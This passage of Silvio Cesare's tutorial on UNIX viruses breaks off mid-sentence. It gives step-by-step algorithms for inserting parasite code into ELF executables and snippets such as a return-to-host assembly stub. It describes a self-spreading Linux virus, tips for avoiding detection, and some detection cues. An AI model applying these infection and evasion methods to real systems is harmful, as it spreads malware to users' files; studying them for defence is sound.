Tutorials - UNIX Viruses (Silvio Cesare)

1. CONTENTS
2. --------
3.  
4. IMPROVING THIS MANUAL
5. THE UNIX-VIRUS MAILING LIST
6. INTRODUCTION
7. THE NON ELF INFECTOR FILE VIRUS (FILE INFECTION)
8. MEMORY LAYOUT OF AN ELF EXECUTABLE
9. ELF INFECTION
10. THE TEXT SEGMENT PADDING VIRUS (PADDING INFECTION)
11. INFECTING INFECTIONS
12. THE DATA SEGMENT VIRUS (DATA INFECTION)
13. VIRUS DETECTION
14. THE TEXT SEGMENT VIRUS (TEXT INFECTION)
15. INFECTION USING OBJECT CODE PARASITES
16. OBJECT CODE LINKING
17. THE IMPLEMENTED INFECTOR
18. NON (NOT AS) TRIVIAL PARASITE CODE
19. BEYOND ELF PARASITES AND ENTER VIRUS IN UNIX
20. THE LINUX PARASITE VIRUS
21. DEVELOPMENT OF THE LINUX VIRUS
22. IMPROVING THE LINUX VIRUS
23. VIRUS DETECTION
24. EVADING VIRUS DETECTION IN ELF INFECTION
25. CONCLUSION
26. SOURCE (UUENCODED)
27.  
28. IMPROVING THIS MANUAL
29.  
30.  
31. For any comments or suggestions (even just to say hi) please contact the author
32. Silvio Cesare, <silvio@big.net.au>.  This paper already has future plans to
33. include more parasite techniques and shared object infection.  More to come.
34.  
35. THE UNIX-VIRUS MAILING LIST
36.  
37. This is the charter for the unix-virus mailing list. Unix-virus was created to
38. discuss viruses in the unix environment from the point of view of the virus
39. creator, and the security developer writing anti-virus software. Anything
40. related to viruses in the unix environment is open for discussion. Low level
41. programming is commonly seen on the list, including source code. The emphasis
42. is on expanding the knowledge of virus technology and not on the distribution
43. of viruses, so binaries are discouraged but not totally excluded. The list is
44. archived at http://virus.beergrave.net and it is recommended that the new
45. subscriber read the existing material before posting.
46.  
47. To subscribe to the list send a message to majordomo@virus.beergrave.net with
48. 'subscribe unix-virus' in the body of the message.
49.  
50. INTRODUCTION
51.  
52. This paper documents the algorithms and implementation of UNIX parasite and
53. virus code using ELF objects.  Brief introductions on UNIX virus detection and
54. evading such detection are given. An implementation of various ELF parasite
55. infectors for UNIX is provided, and an ELF virus for Linux on x86 architecture
56. is also supplied.
57.  
58. Elementary programming and UNIX knowledge is assumed, and an understanding of
59. Linux x86 architecture is assumed for the Linux implementation.  ELF
60. understanding is not required but will help.
61.  
62. This paper does not document any significant virus programming techniques
63. except those that are only applicable to the UNIX environment.  Nor does it
64. try to replicate the ELF specifications.  The interested reader is advised
65. to read the ELF documentation if this paper is unclear in ELF specifics.
66.  
67. THE NON ELF INFECTOR FILE VIRUS (FILE INFECTION)
68.  
69. An interesting, yet simple idea for a virus takes note, that when you append
70. one executable to another, the original executable executes, but the latter
71. executable is still intact and retrievable and even executable if copied to
72. a new file and executed.
73.  
74. # cat host >> parasite
75. # mv parasite host
76. # ./host
77. PARASITE Executed
78.  
79. Now.. if the parasite keeps track of its own length, it can copy the original
80. host to a new file, then execute it like normal, making a working parasite and
81. virus.  The algorithm is as follows:
82.  
83.     * execute parasite work code
84.     * lseek to the end of the parasite
85.     * read the remaining portion of the file
86.     * write to a new file
87.     * execute the new file
88.  
89. The downfall with this approach is that the remaining executable no longer
90. remains strip safe.  This will be explained further on when a greater
91. understanding of the ELF format is obtained, but to summarize, the ELF headers
92. no longer hold into account every portion of the file, and strip removes
93. unaccounted portions. This is the premise of virus detection with this type of
94. virus.
95.  
96. This same method can be used to infect LKM's following similar procedures.
97.  
98. MEMORY LAYOUT OF AN ELF EXECUTABLE
99.  
100. A process image consists of a 'text segment' and a 'data segment'.  The text
101. segment is given the memory protection r-x (from this its obvious that self
102. modifying code cannot be used in the text segment).  The data segment is
103. given the protection rw-.
104.  
105. The segment as seen from the process image is typically not all in use as
106. memory used by the process rarely lies on a page border (or we can say, not
107. congruent to modulo the page size).  Padding completes the segment, and in
108. practice looks like this.
109.  
110. key:
111.     [...]   A complete page
112.     M   Memory used in this segment
113.     P   Padding
114.  
115. Page Nr
116. #1  [PPPPMMMMMMMMMMMM]      \
117. #2  [MMMMMMMMMMMMMMMM]       |- A segment
118. #3  [MMMMMMMMMMMMPPPP]      /
119.  
120. Segments are not bound to use multiple pages, so a single page segment is quite
121. possible.
122.  
123. Page Nr
124. #1      [PPPPMMMMMMMMPPPP]              <- A segment
125.  
126. Typically, the data segment directly proceeds the text segment which always
127. starts on a page, but the data segment may not.  The memory layout for a
128. process image is thus.
129.  
130. key:
131.     [...]   A complete page
132.     T   Text
133.     D   Data
134.     P   Padding
135.  
136. Page Nr
137. #1      [TTTTTTTTTTTTTTTT]              <- Part of the text segment
138. #2      [TTTTTTTTTTTTTTTT]              <- Part of the text segment
139. #3      [TTTTTTTTTTTTPPPP]              <- Part of the text segment
140. #4      [PPPPDDDDDDDDDDDD]              <- Part of the data segment
141. #5      [DDDDDDDDDDDDDDDD]              <- Part of the data segment
142. #6      [DDDDDDDDDDDDPPPP]              <- Part of the data segment
143.  
144. pages 1, 2, 3 constitute the text segment
145. pages 4, 5, 6 constitute the data segment
146.  
147. From here on, the segment diagrams may use single pages for simplicity. eg
148.  
149. Page Nr
150. #1      [TTTTTTTTTTTTPPPP]              <- The text segment
151. #2      [PPPPDDDDDDDDPPPP]              <- The data segment
152.  
153. For completeness, on x86, the stack segment is located after the data segment
154. giving the data segment enough room for growth.  Thus the stack is located at
155. the top of memory (remembering that it grows down).
156.  
157. In an ELF file, loadable segments are present physically in the file, which
158. completely describe the text and data segments for process image loading.  A
159. simplified ELF format for an executable object relevant in this instance is.
160.  
161.     ELF Header
162.     .
163.     .
164.         Segment 1       <- Text
165.         Segment 2       <- Data
166.     .
167.     .
168.  
169. Each segment has a virtual address associated with its starting location.
170. Absolute code that references within each segment is permissible and very
171. probable.
172.  
173. ELF INFECTION
174.  
175. To insert parasite code means that the process image must load it so that the
176. original code and data is still intact.  This means, that inserting a
177. parasite requires the memory used in the segments to be increased.
178.  
179. The text segment compromises not only code, but also the ELF headers including
180. such things as dynamic linking information.  It may be possible to keep the
181. text segment as is, and create another segment consisting of the parasite code,
182. however introducing an extra segment is certainly questionable and easy to
183. detect.
184.  
185. Page padding at segment borders however provides a practical location for
186. parasite code given that its size is able.  This space will not interfere with
187. the original segments, requiring no relocation.  Following the guideline just
188. given of preferencing the text segment, we can see that the padding at the
189. end of the text segment is a viable solution.
190.  
191. Extending the text segment backwards is a viable solution and is documented
192. and implemented further in this article.
193.  
194. Extending the text segment forward or extending the data segment backward will
195. probably overlap the segments.  Relocating a segment in memory will cause
196. problems with any code that absolutely references memory.
197.  
198. It is  possible to extend the data segment, however this isn't preferred,
199. as its not UNIX portable that properly implement execute memory protection.
200. An ELF parasite however is implemented using this technique and is explained
201. later in this article.
202.  
203. THE EXECUTABLE AND LINKAGE FORMAT
204.  
205. A more complete ELF executable layout is (ignoring section content - see
206. below).
207.  
208.     ELF Header
209.     Program header table
210.     Segment 1
211.     Segment 2
212.     Section header table optional  
213.  
214. In practice, this is what is normally seen.
215.  
216.     ELF Header
217.     Program header table
218.     Segment 1
219.     Segment 2
220.     Section header table
221.     Section 1
222.     .
223.     .
224.     Section n
225.  
226. Typically, the extra sections (those not associated with a segment) are such
227. things as debugging information, symbol tables etc.
228.  
229. From the ELF specifications:
230.  
231. "An ELF header resides at the beginning and holds a ``road map'' describing the
232. file's organization. Sections  hold the bulk of object file information for the
233. linking view: instructions, data, symbol table, relocation  information, and so
234. on.
235.  
236. ...
237. ...
238.  
239. A program header table, if present, tells the system how to create a process
240. image.  Files used to build a process image (execute a program) must have a
241. program header table; relocatable files do not need one.  A section header
242. table contains information describing the file's sections.  Every section has
243. an entry in the table; each entry gives information such as the section name,
244. the section size, etc.  Files used during linking must have a section header
245. table; other object files may or may not have one.
246.  
247. ...
248. ...
249.  
250. Executable and shared object files statically represent programs.  To execute
251. such programs, the system uses the files to create dynamic program
252. representations, or process images.  A process image has segments that hold
253. its text, data, stack, and so on.  The major sections in this part discuss the
254. following.
255.  
256. Program header. This section complements Part 1, describing object file
257. structures that relate directly to program execution.  The primary data
258. structure, a program header table, locates segment images within the file and
259. contains other information necessary to create the memory image for the
260. program."
261.  
262. An ELF object may also specify an entry point of the program, that is, the
263. virtual memory location that assumes control of the program.  Thus to
264. activate parasite code, the program flow must include the new parasite.  This
265. can be done by patching the entry point in the ELF object to point (jump)
266. directly to the parasite.  It is then the parasite's responsibility that the
267. host code be executed - typically, by transferring control back to the host
268. once the parasite has completed its execution.
269.  
270. From /usr/include/elf.h
271.  
272. typedef struct
273. {
274.   unsigned char e_ident[EI_NIDENT];     /* Magic number and other info */
275.   Elf32_Half    e_type;                 /* Object file type */
276.   Elf32_Half    e_machine;              /* Architecture */
277.   Elf32_Word    e_version;              /* Object file version */
278.   Elf32_Addr    e_entry;                /* Entry point virtual address */
279.   Elf32_Off     e_phoff;                /* Program header table file offset */
280.   Elf32_Off     e_shoff;                /* Section header table file offset */
281.   Elf32_Word    e_flags;                /* Processor-specific flags */
282.   Elf32_Half    e_ehsize;               /* ELF header size in bytes */
283.   Elf32_Half    e_phentsize;            /* Program header table entry size */
284.   Elf32_Half    e_phnum;                /* Program header table entry count */
285.   Elf32_Half    e_shentsize;            /* Section header table entry size */
286.   Elf32_Half    e_shnum;                /* Section header table entry count */
287.   Elf32_Half    e_shstrndx;             /* Section header string table index */
288. } Elf32_Ehdr;
289.  
290. e_entry is the entry point of the program given as a virtual address.  For
291. knowledge of the memory layout of the process image and the segments that
292. compromise it stored in the ELF object see the Program Header information
293. below.
294.  
295. e_phoff gives use the file offset for the start of the program header table.
296. Thus to read the header table (and the associated loadable segments), you may
297. lseek to that position and read e_phnum*sizeof(Elf32_Pdr) bytes associated with
298. the program header table.
299.  
300. It can also be seen, that the section header table file offset is also given.
301. It was previously mentioned that the section table resides at the end of
302. the file, so after inserting of data at the end of the segment on file, the
303. offset must be updated to reflect the new position.
304.  
305. /* Program segment header.  */
306.  
307. typedef struct
308. {
309.   Elf32_Word    p_type;                 /* Segment type */
310.   Elf32_Off     p_offset;               /* Segment file offset */
311.   Elf32_Addr    p_vaddr;                /* Segment virtual address */
312.   Elf32_Addr    p_paddr;                /* Segment physical address */
313.   Elf32_Word    p_filesz;               /* Segment size in file */
314.   Elf32_Word    p_memsz;                /* Segment size in memory */
315.   Elf32_Word    p_flags;                /* Segment flags */
316.   Elf32_Word    p_align;                /* Segment alignment */
317. } Elf32_Phdr;
318.  
319. Loadable program segments (text/data) are identified in a program header by a
320. p_type of PT_LOAD (1).  Again as with the e_shoff in the ELF header, the
321. file offset (p_offset) must be updated in later phdr's to reflect their new
322. position in the file.
323.  
324. p_vaddr identifies the virtual address of the start of the segment.  As
325. mentioned above regarding the entry point.  It is now possible to identify
326. where program flow begins, by using p_vaddr as the base index and calculating
327. the offset to e_entry.
328.  
329. p_filesz and p_memsz are the file sizes and memory sizes respectively that
330. the segment occupies.  The use of this scheme of using file and memory sizes,
331. is that where its not necessary to load memory in the process from disk, you
332. may still be able to say that you want the process image to occupy its
333. memory.
334.  
335. The .bss section (see below for section definitions), which is for uninitialized
336. data in the data segment is one such case.  It is not desirable that
337. uninitialized data be stored in the file, but the process image must allocated
338. enough memory.  The .bss section resides at the end of the segment and any
339. memory size past the end of the file size is assumed to be part of this
340. section.
341.  
342. /* Section header.  */
343.  
344. typedef struct
345. {
346.   Elf32_Word    sh_name;                /* Section name (string tbl index) */
347.   Elf32_Word    sh_type;                /* Section type */
348.   Elf32_Word    sh_flags;               /* Section flags */
349.   Elf32_Addr    sh_addr;                /* Section virtual addr at execution */
350.   Elf32_Off     sh_offset;              /* Section file offset */
351.   Elf32_Word    sh_size;                /* Section size in bytes */
352.   Elf32_Word    sh_link;                /* Link to another section */
353.   Elf32_Word    sh_info;                /* Additional section information */
354.   Elf32_Word    sh_addralign;           /* Section alignment */
355.   Elf32_Word    sh_entsize;             /* Entry size if section holds table */
356. } Elf32_Shdr;
357.  
358. The sh_offset is the file offset that points to the actual section.  The
359. shdr should correlate to the segment its located it.  It is highly suspicious
360. if the vaddr of the section is different to what is in from the segments
361. view.
362.  
363. THE TEXT SEGMENT PADDING VIRUS (PADDING INFECTION)
364.  
365. The resulting segments after parasite insertion into text segment padding looks
366. like this.
367.  
368. key:
369.     [...]   A complete page
370.     V   Parasite code
371.     T   Text
372.     D   Data
373.     P   Padding
374.  
375. Page Nr
376. #1      [TTTTTTTTTTTTVVPP]              <- Text segment
377. #2      [PPPPDDDDDDDDPPPP]              <- Data segment
378.  
379. ...
380.  
381. After insertion of parasite code, the layout of the ELF file will look like
382. this.
383.  
384.     ELF Header
385.     Program header table
386.     Segment 1   - The text segment of the host
387.             - The parasite
388.     Segment 2
389.     Section header table
390.     Section 1
391.     .
392.     .
393.     Section n
394.  
395. Thus the parasite code must be physically inserted into the file, and the
396. text segment extended to see the new code.
397.  
398.  
399. To insert code at the end of the text segment thus leaves us with the following
400. to do so far.
401.  
402.     * Increase p_shoff to account for the new code in the ELF header
403.     * Locate the text segment program header
404.         * Increase p_filesz to account for the new code
405.         * Increase p_memsz to account for the new code
406.     * For each phdr who's segment is after the insertion (text segment)
407.         * increase p_offset to reflect the new position after insertion
408.     * For each shdr who's section resides after the insertion
409.         * Increase sh_offset to account for the new code
410.     * Physically insert the new code into the file - text segment p_offset
411.       + p_filesz (original)
412.  
413. There is one hitch however. Following the ELF specifications, p_vaddr and
414. p_offset in the Phdr must be congruent together, to modulo the page size.
415.  
416. key:    ~= is denoting congruency.
417.  
418.     p_vaddr (mod PAGE_SIZE) ~= p_offset (mod PAGE_SIZE)
419.  
420. This means, that any insertion of data at the end of the text segment on the
421. file must be congruent modulo the page size.  This does not mean, the text
422. segment must be increased by such a number, only that the physical file be
423. increased so.
424.  
425. This also has an interesting side effect in that often a complete page must be
426. used as padding because the required vaddr isn't available.  The following
427. may thus happen.
428.  
429. key:
430.     [...]   A complete page
431.     T   Text
432.     D   Data
433.     P   Padding
434.  
435. Page Nr
436. #1      [TTTTTTTTTTTTPPPP]              <- Text segment
437. #2      [PPPPPPPPPPPPPPPP]              <- Padding
438. #3      [PPPPDDDDDDDDPPPP]              <- Data segment
439.  
440. This can be taken advantage off in that it gives the parasite code more space,
441. such a spare page cannot be guaranteed.
442.  
443. To take into account of the congruency of p_vaddr and p_offset, our algorithm
444. is modified to appear as this.
445.  
446.     * Increase p_shoff by PAGE_SIZE in the ELF header
447.     * Locate the text segment program header
448.         * Increase p_filesz by account for the new code
449.         * Increase p_memsz to account for the new code
450.     * For each phdr who's segment is after the insertion (text segment)
451.         * increase p_offset by PAGE_SIZE
452.     * For each shdr who's section resides after the insertion
453.         * Increase sh_offset by PAGE_SIZE
454.     * Physically insert the new code and pad to PAGE_SIZE, into the file -
455.       text segment p_offset + p_filesz (original)
456.  
457. Now that the process image loads the new code into being, to run the new code
458. before the host code is a simple matter of patching the ELF entry point and
459. the virus jump to host code point.
460.  
461. The new entry point is determined by the text segment v_addr + p_filesz
462. (original) since all that is being done, is the new code is directly prepending
463. the original host segment.  For complete infection code then.
464.  
465.     * Increase p_shoff by PAGE_SIZE in the ELF header
466.     * Patch the insertion code (parasite) to jump to the entry point
467.       (original)
468.     * Locate the text segment program header
469.         * Modify the entry point of the ELF header to point to the new
470.           code (p_vaddr + p_filesz)
471.         * Increase p_filesz by account for the new code (parasite)
472.         * Increase p_memsz to account for the new code (parasite)
473.     * For each phdr who's segment is after the insertion (text segment)
474.         * increase p_offset by PAGE_SIZE
475.     * For each shdr who's section resides after the insertion
476.         * Increase sh_offset by PAGE_SIZE
477.     * Physically insert the new code (parasite) and pad to PAGE_SIZE, into
478.       the file - text segment p_offset + p_filesz (original)
479.  
480. This, while perfectly functional, can arouse suspicion because the the new
481. code at the end of the text segment isn't accounted for by any sections.
482. Its an easy matter to associate the entry point with a section however by
483. extending its size, but the last section in the text segment is going to look
484. suspicious.  Associating the new code to a section must be done however as
485. programs such as 'strip' use the section header tables and not the program
486. headers.  The final algorithm is using this information is.
487.  
488.     * Increase p_shoff by PAGE_SIZE in the ELF header
489.     * Patch the insertion code (parasite) to jump to the entry point
490.       (original)
491.     * Locate the text segment program header
492.         * Modify the entry point of the ELF header to point to the new
493.           code (p_vaddr + p_filesz)
494.         * Increase p_filesz by account for the new code (parasite)
495.         * Increase p_memsz to account for the new code (parasite)
496.     * For each phdr who's segment is after the insertion (text segment)
497.         * increase p_offset by PAGE_SIZE
498.     * For the last shdr in the text segment
499.         * increase sh_len by the parasite length
500.     * For each shdr who's section resides after the insertion
501.         * Increase sh_offset by PAGE_SIZE
502.     * Physically insert the new code (parasite) and pad to PAGE_SIZE, into
503.       the file - text segment p_offset + p_filesz (original)
504.  
505. infect-elf-p is the supplied program (complete with source) that implements
506. the elf infection using text segment padding as described.
507.  
508. INFECTING INFECTIONS
509.  
510. In the parasite described, infecting infections isn't a problem at all.  By
511. skipping executables that don't have enough padding for the parasite, this
512. is solved implicitly.  Multiple parasites may exist in the host, but their is
513. a limit of how many depending on the size of the parasite code.
514.  
515. THE DATA SEGMENT VIRUS (DATA INFECTION)
516.  
517. The new method of ELF infection as briefly described in the last section means
518. that the data segment is extended and the parasite is located in the new
519. extended space.  In x86 architecture, at least, code that is in the data
520. segment may be executed.
521.  
522. To extend the data segment means we simply have to extend the program header
523. in the ELF executable.  Note must be taken though, that the .bss section
524. ends the data segment normally.  This section is used for uninitialized data
525. and occupies no file space but does occupy memory space.  If we extend
526. the data segment we have to leave space for the .bss section.  The memory
527. layout is as follows.
528.  
529. original:
530.  
531.     [text]
532.     [data]
533.  
534. parasite:
535.  
536.     [text]
537.     [data]
538.     [parasite]
539.  
540. The algorithm for the data segment parasite is show below.
541.  
542.         * Patch the insertion code (parasite) to jump to the entry point
543.           (original)
544.         * Locate the data segment
545.                 * Modify the entry point of the ELF header to point to the new
546.                   code (p_vaddr + p_memsz)
547.                 * Increase p_filesz to account for the new code and .bss
548.                 * Increase p_memsz to account for the new code
549.                 * Find the length of the .bss section (p_memsz - p_filesz)
550.         * For each phdr who's segment is after the insertion (text segment)
551.                 * increase p_offset to reflect the new position after insertion
552.         * For each shdr who's section resides after the insertion
553.                 * Increase sh_offset to account for the new code
554.         * Physically insert the new code into the file
555.  
556. The algorithm shown works for an ELF executable but the parasite inserted into
557. the host becomes strip unsafe because no section matches the parasite.  A
558. new section could be created for this purpose to become strip safe again.
559. This however has not been implemented.
560.  
561. This type of virus is easy to spot if you know what your looking for.  For
562. starters no section matches the entry point and more suspect is the fact that
563. the entry point is in the data segment.
564.  
565. VIRUS DETECTION
566.  
567. The detection of the data segment virus is extremely easy taking into account
568. that the entry point of the ELF image is in the data segment not in the text
569. segment.
570.  
571. An implementation of a simple virus scanner is supplied.
572.  
573. THE TEXT SEGMENT VIRUS (TEXT INFECTION)
574.  
575. The text segment virus works under the premise that the text segment can be
576. extended backwards and new parasite code can run in the extension. The memory
577. layout is as follows.
578.  
579. original:
580.  
581.     [text]
582.     [data]
583.  
584.  
585. parasite:
586.  
587.     [parasite] (new start of text)
588.     [text]
589.     [data]
590.  
591. The algorithm is as follows:
592.  
593.         * Patch the insertion code (parasite) to jump to the entry point
594.           (original)
595.         * Locate the text segment
596.  
597.         * For each phdr who's segment is after the insertion (text segment)
598.                 * increase p_offset to reflect the new position after insertion
599.         * For each shdr who's section resides after the insertion
600.                 * Increase sh_offset to account for the new code
601.         * Physically insert the new code into the file
602.  
603.  
604. INFECTION USING OBJECT CODE PARASITES
605.  
606. It is often desireable not to use assembler for parasite code but use direct
607. C code instead.  This can make writing a pure C virus possible avoiding the
608. messy steps of converting code to asm which require extra time and skill.
609.  
610. This can be acheived through the use of relocatable or object code.  Because
611. we cant just extract an executeable image as the parasite image because the
612. image is fixed at a certain memory location we can use a relocatable image and
613. link into the desired location.
614.  
615. OBJECT CODE LINKING
616.  
617. ELF is the typical standard used to represent object code on Linux.  The paper
618. will thus only refer to linking using ELF objects.
619.  
620. An object code file is referred to as relocatable code when using ELF because
621. that summarizes what it is.  It is not fixed to any memory position.  It is
622. the responsibility of linking that makes an executable image out of a
623. relocatable object and binds symbols to addresses.
624.  
625. Linking of code is done by relocating the code to a fixed positing.  For the
626. most part, the object code does not need to be changed heavily.
627.  
628. Consider the following C code.
629.  
630. #include <linux/unistd.h>
631. #include <linux/types.h>
632.  
633. static inline _syscall3(ssize_t, write, int, fd, const void *, buf, size_t, count);
634.  
635. int main()
636. {
637.         write(1, "INFECTED Host\n", 14);
638. }
639.  
640. The string 's' being part of the relocatable text section in the object
641. has no known absolute position in memory at compile time.  Likewise, printk,
642. is an externally defined symbol and its address is also not known at compile
643. time.
644.  
645. Relocation sections in the ELF object are used for describing what needs to be
646. modified (relocated) in the object.  In the above case, relocation entries
647. would be made for printk's reference and the string's reference.
648.  
649. The format for an ELF relocatable object (object code) is as follows.
650.  
651.         ELF header
652.         Program header table
653.         Section 1
654.         Section n
655.         Section header table
656.  
657. From the ELF specifications.
658.  
659.  
660. "String Table
661.  
662. String table sections hold null-terminated character sequences, commonly called
663. strings.  The object file uses these strings to represent symbol and section
664. names.  One references a string as an index into the string table section.  The
665. first byte, which is index zero, is defined to hold a null character.
666. Likewise, a string tables last byte is defined to hold a null character,
667. ensuring null termination for all strings.  A string whose index is zero
668. specifies either no name or a null name, depending on the context.  An empty
669. string table section is permitted; its section headers sh_size member would
670. contain zero.  Non-zero indexes are invalid for an empty string table."
671.  
672. .
673. .
674. .
675.  
676. Symbol Table
677.  
678. An object file's symbol table holds information needed to locate and relocate a
679. program's symbolic definitions and references.  A symbol table index is a
680. subscript into this array.  Index 0 both designates the first entry in the
681. table and serves as the undefined symbol index.  The contents of the initial
682. entry are specified later in this section."
683.  
684. /* Symbol table entry.  */
685.  
686. typedef struct
687. {
688.   Elf32_Word    st_name;                /* Symbol name (string tbl index) */
689.   Elf32_Addr    st_value;               /* Symbol value */
690.   Elf32_Word    st_size;                /* Symbol size */
691.   unsigned char st_info;                /* Symbol type and binding */
692.   unsigned char st_other;               /* No defined meaning, 0 */
693.   Elf32_Section st_shndx;               /* Section index */
694. } Elf32_Sym;
695.  
696. #define SHN_UNDEF       0               /* No section, undefined symbol.  */
697.  
698. /* How to extract and insert information held in the st_info field.  */
699.  
700. #define ELF32_ST_TYPE(val)              ((val) & 0xf)
701. #define ELF32_ST_INFO(bind, type)       (((bind) << 4) + ((type) & 0xf))
702.  
703. /* Legal values for ST_BIND subfield of st_info (symbol binding).  */
704.  
705. #define STB_LOCAL       0               /* Local symbol */
706. #define STB_GLOBAL      1               /* Global symbol */
707. #define STB_WEAK        2               /* Weak symbol */
708. #define STB_NUM         3               /* Number of defined types.  */
709. #define STB_LOPROC      13              /* Start of processor-specific */
710. #define STB_HIPROC      15              /* End of processor-specific */
711.  
712. From the ELF specifications.
713.  
714. "A relocation section references two other sections: a symbol table and a
715. section to modify.  The section headers sh_info and sh_link members, described
716. in ``Sections'' above, specify these relationships. Relocation entries for
717. different object files have slightly different interpretations for the r_offset
718. member.
719.  
720. In relocatable files, r_offset holds a section offset.  That is, the relocation
721. section itself describes how to modify another section in the file; relocation
722. offsets designate a storage unit within the second section."
723.  
724. From /usr/include/elf.h
725.  
726. /* Relocation table entry without addend (in section of type SHT_REL).  */
727.  
728. typedef struct
729. {
730.   Elf32_Addr    r_offset;               /* Address */
731.   Elf32_Word    r_info;                 /* Relocation type and symbol index */
732. } Elf32_Rel;
733.  
734. /* How to extract and insert information held in the r_info field.  */
735.  
736. #define ELF32_R_SYM(val)                ((val) >> 8)
737. #define ELF32_R_TYPE(val)               ((val) & 0xff)
738. #define ELF32_R_INFO(sym, type)         (((sym) << 8) + ((type) & 0xff))
739.  
740. These selected paragraphs and sections from the ELF specifications and header
741. files give us a good high level concept of how a relocatable ELF file can
742. be linked to produce an image capable of being executed.
743.  
744. The process of linking the image is as follows.
745.  
746.         * Identify the file as being in relocatable ELF format
747.         * Load each relevant section into memory
748.         * For each PROGBITS section set the section address in memory
749.         * For each REL (relocation) section, carry out the relocation
750.         * Assemble the executable image by copying the sections into their
751.                 respective positions in memory
752.  
753. The relocation step may be expanded into the following algorithm.
754.  
755.         * Evaluate the target section of the relocation entry
756.         * Evaluate the symbol table section of the relocation entry
757.         * Evaluate the location in the section that the relocation is to apply
758.         * Evaluate the address of the symbol that is used in the relocation
759.         * Apply the relocation
760.  
761. The actual relocation is best presented by looking at the source.  For more
762. information on the relocation types refer to the ELF specifications.  Note
763. that we ignore the global offset table completely and any relocation types
764. of its nature.
765.  
766.         switch (ELF32_R_TYPE(rel->r_info)) {
767.         case R_386_NONE:
768.                 break;
769.  
770.         case R_386_PLT32:
771.         case R_386_PC32:
772.                 *loc -= dot;    /* *loc += addr - dot   */
773.  
774.         case R_386_32:
775.                 *loc += addr;
776.                 break;
777.  
778. THE IMPLEMENTED INFECTOR
779.  
780. The implemented infector must use C parasite code that avoids libc and uses
781. Linux syscalls exclusively.  This means that plt/got problems are avoided.
782. Likewise the parasite code must end in the following asm:
783.  
784. loop1:
785.                popl    %eax
786.                cmpl    $0x22223333, %eax
787.                jne     loop1
788.  
789.                popl    %edx
790.                popl    %ecx
791.                popl    %ebx
792.                popl    %eax
793.                popl    %esi
794.                popl    %edi
795.                movl    $0x11112222, %ebp
796.                jmp     *%ebp
797.  
798. This is so it can jump back to the host correctly.  It uses a little trickery
799. to do this properly.  Why the popl loop? - well.. the jump back to host goes in
800. _before_ the end of main, so there are still some variables to be pop'd back
801. before your back to where you start.  you dont know how many variables have
802. been pushed, so a unique magic number is used to mark the start/end of it -
803. check the initcode in relocater.c.  The movl $0x11112222,%ebp ? - well.. u dont
804. know where abouts this jmp (back to host) is going to be in the code, so you
805. substitute a unique magic number where you want the host entry point to go.
806. Then you search the object code for the magic and replace.
807.  
808. NON (NOT AS) TRIVIAL PARASITE CODE
809.  
810. Parasite code that requires memory access requires the stack to be used
811. manually naturally.  No bss section can be used from within the virus code in
812. the padding and text infectors because it can only use part of the text
813. segment.  It is strongly suggested that rodata not be used, in-fact, it is
814. strongly suggested that no location specific data be used at all that resides
815. outside the parasite at infection time.
816.  
817. Thus, if initialized data is to be used, it is best to place it in the text
818. segment, ie at the end of the parasite code - see below on calculating address
819. locations of initialized data that is not known at compile/infection time.
820.  
821. If the heap is to be used, then it will be operating system dependent.  In
822. Linux, this is done via the 'brk' syscall.
823.  
824. The use of any shared library calls from within the parasite should be removed,
825. to avoid any linking problems and to maintain a portable parasite in files
826. that use varying libraries.  It is thus naturally recommended to avoid using
827. libc.
828.  
829. Most importantly, the parasite code must be relocatable.  It is possible to
830. patch the parasite code before inserting it, however the cleanest approach
831. is to write code that doesn't need to be patched.
832.  
833. In x86 Linux, some syscalls require the use of an absolute address pointing to
834. initialized data.  This can be made relocatable by using a common trick used
835. in buffer overflow code.
836.  
837.     jmp A
838. B:
839.     pop %eax    ; %eax now has the address of the string
840.     .       ; continue as usual
841.     .
842.     .
843.  
844. A:
845.     call B
846. .string \"hello\"
847.  
848. By making a call directly proceeding the string of interest, the address of
849. the string is pushed onto the stack as the return address.
850.  
851. BEYOND ELF PARASITES AND ENTER VIRUS IN UNIX
852.  
853. In a UNIX environment the most probably method for a typical garden variety
854. virus to spread is through infecting files that it has legal permission to do
855. so.  
856.  
857. A simple method of locating new files possible to infect, is by scanning the
858. current directory for writable files.  This has the advantage of being
859. relatively fast (in comparison to large tree walks) but finds only a small
860. percentage of infect-able files.
861.  
862. Directory searches are however very slow irrespectively, even without large
863. tree walks.  If parasite code does not fork, its very quickly noticed what is
864. happening.  In the sample virus supplied, only a small random set of files
865. in the current directory are searched.
866.  
867. Forking, as mentioned, easily solves the problem of slowing the startup to
868. the host code, however new processes on the system can be spotted as abnormal
869. if careful observation is used.
870.  
871. The parasite code as mentioned, must be completely written in machine code,
872. this does not however mean that development must be done like this.
873. Development can easily be done in a high level language such as C and then
874. compiled to asm to be used as parasite code.
875.  
876. A bootstrap process can be used for initial infection of the virus into a host
877. program that can then be distributed.  That is, the ELF infector code is used,
878. with the virus as the parasite code to be inserted.
879.  
880. THE LINUX PARASITE VIRUS
881.  
882. This virus implements the ELF infection described by utilizing the padding at
883. the end of the text segment.  In this padding, the virus in its entirety is
884. copied, and the appropriate entry points patched.
885.  
886. At the end of the parasite code, are the instructions.
887.  
888.     movl    %ebp, $XXXX
889.     jmp *%ebp
890.  
891. XXXX is patched when the virus replicates to the host entry point.  This
892. approach does have the side effect of trashing the ebp register which may or
893. may not be destructive to programs who's entry points depend on ebp being set
894. on entry.  In practice, I have not seen this happen (the implemented Linux
895. virus uses the ebp approach), but extensive replicating has not been performed.
896.  
897. On execution of an infected host, the virus will copy the parasite (virus)
898. code contained in itself (the file) into memory.
899.  
900. The virus will then scan randomly (random enough for this instance) through
901. the current directory, looking for ELF files of type ET_EXEC or ET_DYN to
902. infect.  It will infect up to Y_INFECT files, and scan up to N_INFECT files in
903. total.
904.  
905. If a file can be infected, ie, its of the correct ELF type, and the padding
906. can sustain the virus, a a modified copy of the file incorporating the virus
907. is made.  It then renames the copy to the file its infecting, and thus it
908. is infected.
909.  
910. Due to the rather large size of the virus in comparison to the page size
911. (approx 2.3k) not all files are able to be infected, in fact only near half on
912. average.
913.  
914. DEVELOPMENT OF THE LINUX VIRUS
915.  
916. The Linux virus was completely written in C, and strongly based around the
917. ELF infector code.  The C code is supplied as elf-p-virus.c  The code requires
918. the use of no libraries, and avoids libc by using a similar scheme to the
919. _syscall declarations Linux employs modified not to use errno.
920.  
921. Heap memory was used for dynamic allocation of the phdr and shdr tables using
922. 'brk'.
923.  
924. Linux has some syscalls which require the address of initialized strings to
925. be passed to it, notably, open, rename, and unlink.  This requires initialized
926. data storage.  As stated before, rodata cannot be used, so this data was
927. placed at the end of the code.  Making it relocatable required the use of the
